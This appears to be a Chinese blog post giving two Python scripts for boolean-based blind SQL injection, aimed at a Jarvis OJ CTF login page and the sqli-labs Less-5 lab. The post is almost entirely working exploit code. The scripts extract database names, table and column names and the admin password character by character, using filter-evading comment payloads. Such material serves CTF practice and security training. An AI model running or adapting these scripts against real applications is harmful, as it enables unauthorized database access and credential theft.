sql注入盲注脚本

发表于 | 分类于 | 阅读数

前言

选取了两条盲注题作为例题,记录了几个典型写法的脚本

Simple Injection

题目地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# -*- coding:utf8 -*-
import requests
import string

str1 = '1234567890' + string.ascii_letters + string.punctuation
flag = ''

select0 = 'select/**/database()'
select1 = 'select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()'
select2 = 'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()'
select = 'select/**/password/**/from/**/admin'
url = "http://web.jarvisoj.com:32787/login.php"
for j in range(1, 66):
    for i in str1:
        paylaod = "admin'/**/and/**/(if(substr(({}),{},1)='{}',1,0))/**/and/**/'1".format(select, j, i)
        # print(paylaod)
        data = {
            'username': paylaod,
            'password': 'admin'
        }
        r = requests.post(url, data=data)
        if '密码错误' in r.text:
            flag += i
            print(flag)
            break

sqli-labs Less-5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import requests
import string


class GetInject:
    # mysql不区分大小写,一般表名、列名都是由字母组成的比较多,所以把字母集放前面,先枚举
    chr_str = string.ascii_lowercase + string.punctuation + string.digits

    def __init__(self, url, mark, obj):
        '''
        obj参数举例:
        obj = "database()"
        obj = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
        '''
        self.url = url
        self.mark = mark
        self.obj = obj

    def get_length(self):
        payload_len = "' and length({0})={1} --+"
        # 如果实例参数是双引号型或者整数型,记得把改payload格式
        i = 1
        while True:
            payload_len_i = payload_len.format(self.obj, i)
            r = requests.get(self.url + payload_len_i)
            if self.mark in r.text:
                print("len", i)
                return i
            i += 1

    def get_name(self):
        name_len = self.get_length()
        payload_name = "' and substr({0},{1},1)='{2}' --+"
        output = ''
        for i in range(1, name_len + 1):
            for c in self.chr_str:  # 直接枚举
                payload_name_i = payload_name.format(self.obj, i, c)
                r = requests.get(url + payload_name_i)
                if self.mark in r.text:
                    output += c
                    print(output)
                    break
        return output


# mark 是判断为True还是False的标志,这里是you are in
url = "http://127.0.0.1/sqli/Less-5/?id=1"
mark = "You are in"
obj_t = "(select group_concat(table_name) from information_schema.tables where table_schema=database())"
obj_c = "(select group_concat(column_name) from information_schema.columns where table_schema=database())"

test1 = GetInject(url, mark, obj_c)
test1.get_name()